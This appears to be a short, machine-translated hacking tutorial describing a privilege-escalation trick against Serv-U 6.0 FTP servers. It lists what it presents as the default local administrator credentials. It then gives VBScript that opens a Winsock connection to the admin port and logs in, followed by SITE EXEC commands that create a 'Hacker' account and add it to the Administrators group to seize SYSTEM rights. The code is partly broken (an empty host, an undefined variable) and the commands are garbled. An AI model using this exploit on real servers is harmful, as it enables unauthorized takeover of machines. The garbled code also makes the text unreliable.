SERV-U6.0 proposal new trick
From: Black Defense April Journal
Applicable environment: Server disables FSO, turn off WScript.Shelll, no permission.
Limit: There is no change in the administrator's password, or crack the password of the administrator of the Serv-U. Serv-U Default User Name: Localadministrator Password: # | @ $ AK #. | K; 0 @p The following with Mswinsock. Winsock creates a connection and adds a super user with System permissions, the code is as follows:
Dim Revdata
Dim Sendata
Set Sock = CreateObject ("Mswinsock.winsock")
Sock.Protocol = 0
Sock.Connect "", 43958
Sendata = "Localadministrator" & chr (10) & chr (13)
Sock.senddata Sdata
Sendata = "# | @ $ AK #. | K; 0 @p" & chr (10) & chr (13)
With this code, you can connect to FTP. Next, use Sock.sendData Sendata to send the addition to the execution permission user, you will know how to do it, right, just use "Site Exec Net User Hacker / Adder / Add" "Site EXEC NET LOCALGROUP Administrators HACKER / ADD"
Oh, so system authority is in hand, I wish you all good luck!